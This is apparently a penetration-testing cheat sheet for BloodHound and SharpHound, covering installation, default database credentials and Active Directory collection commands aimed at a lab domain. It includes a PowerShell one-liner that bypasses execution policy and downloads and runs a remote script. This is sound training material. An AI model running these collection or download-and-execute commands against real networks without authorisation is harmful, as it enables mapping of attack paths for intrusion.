# Bloodhound

**Installation**:&#x20;

```
apt install bloodhound  
neo4j console 
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j 
./bloodhound 
```

**Collection examples:**&#x20;

`Execute-assembly SharpHound.exe`&#x20;

`powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-Bloodhound -CollectionMethod all,loggedon`&#x20;

`SharpHound.exe (from resources/Ingestor)`&#x20;

`SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100`&#x20;

`SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100`&#x20;

\
&#x20;`SharpHound.exe -c all -d active.htb -SearchForest`&#x20;

`SharpHound.exe --EncryptZip --ZipFilename export.zip` \
&#x20;\
`Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public`&#x20;

**Collection Linux:**&#x20;

<https://github.com/fox-it/BloodHound.py>

Guides and resources:&#x20;

<https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/>&#x20;

<https://en.hackndo.com/bloodhound/>&#x20;
